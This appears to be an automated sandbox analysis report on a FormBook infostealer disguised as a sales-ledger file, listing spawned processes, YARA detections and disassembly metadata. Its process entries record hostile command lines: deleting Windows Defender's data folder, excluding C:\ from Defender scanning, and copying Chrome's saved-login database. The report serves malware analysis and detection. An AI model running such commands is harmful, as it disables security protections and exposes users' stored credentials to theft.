                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 6332 Parent PID: 5792

                                                                                                              General

                                                                                                              Start time:14:39:55
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 7124 Parent PID: 6332

                                                                                                              General

                                                                                                              Start time:14:40:02
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 2420 Parent PID: 5792

                                                                                                              General

                                                                                                              Start time:14:40:07
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'powershell' Add-MpPreference -ExclusionPath C:\
                                                                                                              Imagebase:0x2d0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 6220 Parent PID: 2420

                                                                                                              General

                                                                                                              Start time:14:40:07
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 6300 Parent PID: 5792

                                                                                                              General

                                                                                                              Start time:14:40:08
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Imagebase:0x710000
                                                                                                              File size:736256 bytes
                                                                                                              MD5 hash:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 29%, ReversingLabs
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 6300

                                                                                                              General

                                                                                                              Start time:14:40:10
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:
                                                                                                              Imagebase:0x7ff714890000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: cmmon32.exe PID: 6856 Parent PID: 3388

                                                                                                              General

                                                                                                              Start time:14:40:33
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Imagebase:0x960000
                                                                                                              File size:36864 bytes
                                                                                                              MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: cmd.exe PID: 2644 Parent PID: 6856

                                                                                                              General

                                                                                                              Start time:14:40:43
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                                                                                              Imagebase:0x380000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 3468 Parent PID: 2644

                                                                                                              General

                                                                                                              Start time:14:40:43
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 5792 Parent PID: 5616 Require your Sales Ledger from 01-April-2020.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 010609AE, Relevance: 3.5, Strings: 2, Instructions: 957COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,Ll$,Ll
                                                                                                                • API String ID: 0-1701323609
                                                                                                                • Opcode ID: 4316e62d4cdce529ac9fb2cd2999adf39481b2d73d01fdaa075ef1200c045fe3
                                                                                                                • Instruction ID: 3eaae62350bde2989da66927de68d5b7ee0cdeb395da8bb6d64600a6ab4f4a32
                                                                                                                • Opcode Fuzzy Hash: 4316e62d4cdce529ac9fb2cd2999adf39481b2d73d01fdaa075ef1200c045fe3
                                                                                                                • Instruction Fuzzy Hash: 8682AC75E006298FCB14CF69D880AADB7F2FF89304F15C5A9E04AEB355DB34A945CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01061BE0, Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 9c83841eae76b45827796401e487d628ef72f8de449ab47f0b5c56c990d96627
                                                                                                                • Instruction ID: e373133c2e41a2cf6b13e85131cfa99406485359c472430f4531845272b77122
                                                                                                                • Opcode Fuzzy Hash: 9c83841eae76b45827796401e487d628ef72f8de449ab47f0b5c56c990d96627
                                                                                                                • Instruction Fuzzy Hash: BEA1DD31F005098FCB10DFADD8805AEBBF6EBC8225B25897AD615DB755DB30ED418B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01061748, Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `l
                                                                                                                • API String ID: 0-379310572
                                                                                                                • Opcode ID: 892a8a0e57ddac257720120afa3d83f56d8d757a037e98837aa23ebad5ad9659
                                                                                                                • Instruction ID: c2a83394e77ed275640400b2cfd0103b7f0a0c4282eb50f6d70abb0dd1bc0d2f
                                                                                                                • Opcode Fuzzy Hash: 892a8a0e57ddac257720120afa3d83f56d8d757a037e98837aa23ebad5ad9659
                                                                                                                • Instruction Fuzzy Hash: E8815832F105149FD754EB69DC84AAEB7E7AFC8614F1A81A8E409DB765DF30AC018B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01060640, Relevance: .2, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cace1fe2acf2c7d1e2b8789d099ab1407658df841c28b50cf491a3aa575e8bf2
                                                                                                                • Instruction ID: dacd38d7a2d2e107f7d33f337388781126a3cc585f57d04251cd5b6e89883cfb
                                                                                                                • Opcode Fuzzy Hash: cace1fe2acf2c7d1e2b8789d099ab1407658df841c28b50cf491a3aa575e8bf2
                                                                                                                • Instruction Fuzzy Hash: 7171E7B8E4020A9FDF54CFA9D485ABEB7F1BB48300F10A659E402EB295DF35A9418F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 010617F9, Relevance: .2, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dde1afec9feb8211a7ad7a0c54af55a4e4d5df648becfa16eee692820985b9f7
                                                                                                                • Instruction ID: 90c7c7b6253af2fdc94aca2458f1a2b53255c2828b7126ac00ac4f5361e66be4
                                                                                                                • Opcode Fuzzy Hash: dde1afec9feb8211a7ad7a0c54af55a4e4d5df648becfa16eee692820985b9f7
                                                                                                                • Instruction Fuzzy Hash: 25614932F115248FD754DB69DC80A9EB3E3AFC8614F1AC164E4099B7A9DF34AC018B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106DF00, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DF70
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0106DFAD
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DFEA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0106E043
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 810e7658a1325281c836b4ad6581a382e82220de2dcc0aff9c0ce25f8b3092a0
                                                                                                                • Instruction ID: a09374c9242c30b38cdba4dd54bdbeaf318c725f79492c79ff175936c0894361
                                                                                                                • Opcode Fuzzy Hash: 810e7658a1325281c836b4ad6581a382e82220de2dcc0aff9c0ce25f8b3092a0
                                                                                                                • Instruction Fuzzy Hash: 975174B090074A8FEB14CFA9D548BDEBBF1EF48314F208059E059A7351DB38A984CF66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106DF10, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DF70
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0106DFAD
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DFEA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0106E043
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: fef79344e78f9296b6094bfb47b81d9c09ac542e1ec055add8bfc9d4aa2ede44
                                                                                                                • Instruction ID: 7234143e302673c5b33c22ee14a87ffa2a084bd271b47b4839166eeb58ea8aa0
                                                                                                                • Opcode Fuzzy Hash: fef79344e78f9296b6094bfb47b81d9c09ac542e1ec055add8bfc9d4aa2ede44
                                                                                                                • Instruction Fuzzy Hash: 785154B090074A8FEB14DFA9D548BDEBBF4EB48314F208459E059A7350DB74A984CF66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E2B4A8, Relevance: 1.9, APIs: 1, Instructions: 359COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bade2ea90acffe15dfb6966a7e54f7721651e1e65451439106a95cf679180d63
                                                                                                                • Instruction ID: 42a69da9e3aa1e1a66818da766c9b4a5b2f6144cd56e5439faba31efdd608048
                                                                                                                • Opcode Fuzzy Hash: bade2ea90acffe15dfb6966a7e54f7721651e1e65451439106a95cf679180d63
                                                                                                                • Instruction Fuzzy Hash: CAD17A34B006158FDB18EB78D5649AE73F2EF89208B2544A9D506EB3A0DF35FD01CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E224A0, Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 667471026137cb7890e4932b159eedd9c3cfac2dc0c7dccbae1d32fdb95b9620
                                                                                                                • Instruction ID: 2da764a2a5e1b67e356e2eb9dcbb6854315e14aa8dd30782be22b260b0321aee
                                                                                                                • Opcode Fuzzy Hash: 667471026137cb7890e4932b159eedd9c3cfac2dc0c7dccbae1d32fdb95b9620
                                                                                                                • Instruction Fuzzy Hash: 6391A4B1C093489FDB02CFA4C8949DDBFB1FF4A314F26819AE444AB262D734594ACF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E28080, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,0395413C,02970B14,?,00000000), ref: 04E281DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: c9395eec0b1f6c07dafa0debdc0298000471f9fa1a19de6347f117f42fd6d7e4
                                                                                                                • Instruction ID: 0f4c6f0afcc09414d26f127d4e19e19e3d065ff29aaae795b9ebf5aaaeb9598a
                                                                                                                • Opcode Fuzzy Hash: c9395eec0b1f6c07dafa0debdc0298000471f9fa1a19de6347f117f42fd6d7e4
                                                                                                                • Instruction Fuzzy Hash: EE719D34A01218AFDB14DFA9D984DAEBBB6FF48714F115198F901AB361CB31EC81CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E225F8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E2270A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: e32bd16cce61a51274e750899ee83a525ba84d1e9a7f1a7faaa090a85ebb6698
                                                                                                                • Instruction ID: 8f9ad6170a5182af8a1b283eb038611bf61588d3cf3a2c73eabc0395b0b2af23
                                                                                                                • Opcode Fuzzy Hash: e32bd16cce61a51274e750899ee83a525ba84d1e9a7f1a7faaa090a85ebb6698
                                                                                                                • Instruction Fuzzy Hash: E841C0B1D003199FDF14CFA9C984ADEBBB5FF48314F24812AE919AB210D774A985CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01067BCD, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01067C89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 20564da41df240e8c96f3a6c521c29fe2a505d5f45c56362de46e5ef5c67d925
                                                                                                                • Instruction ID: 75016c18d5c48596f6191f6e10e5c2b69eb068ef44f9bf3e63be05add8afb0d2
                                                                                                                • Opcode Fuzzy Hash: 20564da41df240e8c96f3a6c521c29fe2a505d5f45c56362de46e5ef5c67d925
                                                                                                                • Instruction Fuzzy Hash: 9241E171C0461CCBDB24DFAAC8847DEBBF5BF89308F20806AD548AB251DB755946CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E2081C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04E24C71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: 54cdee025482d37df23c92abb231f17b7eac79333979aac1a231930e9174d4ba
                                                                                                                • Instruction ID: 69c8ca76b1b5bc4db340d63e56342a0e7df9f43966d3259be5df304495ca2b4b
                                                                                                                • Opcode Fuzzy Hash: 54cdee025482d37df23c92abb231f17b7eac79333979aac1a231930e9174d4ba
                                                                                                                • Instruction Fuzzy Hash: 8B417BB4A00315CFDB04CF99C549AAABBF5FF88314F248598D419AB361D734A841CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01066670, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01067C89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: db88209fb3341900a1f5024e658fc8ccc88b957c19a0ea25e60432f7684c5b99
                                                                                                                • Instruction ID: c5e31aaaf0e569b4187c7fee911f5978188613db788fa6d0687b9d481ad1c5cf
                                                                                                                • Opcode Fuzzy Hash: db88209fb3341900a1f5024e658fc8ccc88b957c19a0ea25e60432f7684c5b99
                                                                                                                • Instruction Fuzzy Hash: D741E271C0461DCBDB24DFAAC884B9EBBF5BF49308F20805AD509AB251DB756949CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04E22800, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,?,?), ref: 04E2289D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378638983-0
                                                                                                                • Opcode ID: 282dedd2fd07008cba6dd9ab5182fe6e13b8793b9225de6256b77c8630bb3f76
                                                                                                                • Instruction ID: bca6abfbb9e018165d98bae55601c271b7ccbc1b69e0fe1fb11aa02a208c0847
                                                                                                                • Opcode Fuzzy Hash: 282dedd2fd07008cba6dd9ab5182fe6e13b8793b9225de6256b77c8630bb3f76
                                                                                                                • Instruction Fuzzy Hash: CA21DDB1800248DFDB01DF94E985ACEBFF4FF48314F14845AE915AB212D775AA05CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106C0E9, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0106C156
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: f383e3fb1e77699a33797e224521d870076e6cb07cc626375575086c736cbc8b
                                                                                                                • Instruction ID: 38447710a02889740390c1a3553edeba5c94855f73c4d26d35b4f267b39bee08
                                                                                                                • Opcode Fuzzy Hash: f383e3fb1e77699a33797e224521d870076e6cb07cc626375575086c736cbc8b
                                                                                                                • Instruction Fuzzy Hash: 7B319171A002088FEB04DFAAD4447DFBBF9EF89710F10805AE459AB310CB75A801CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106C370, Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106C1D1,00000800,00000000,00000000), ref: 0106C3E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8a84b5c8981328bed2ea51d995e108593ad72953f5d690fc3741230e5bd8a58a
                                                                                                                • Instruction ID: 79e397cf9fd6068a6920dcda64afa33816653710becd677f809924d6af5446fd
                                                                                                                • Opcode Fuzzy Hash: 8a84b5c8981328bed2ea51d995e108593ad72953f5d690fc3741230e5bd8a58a
                                                                                                                • Instruction Fuzzy Hash: 6C219AB2C043488FDB10CFAAD444ADEFFF4EB98320F04845AD5A5A7601C3399609CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0106E138, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E1BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: fb78727a05851a88ea4b7b8ea7d3137774103afe78fcb1ef393a7670f36c1bb4
                                                                                                                • Instruction ID: 7c9f661a25afa755f363d3955148c039963ecfaba38917ffda295ed64af0ae82
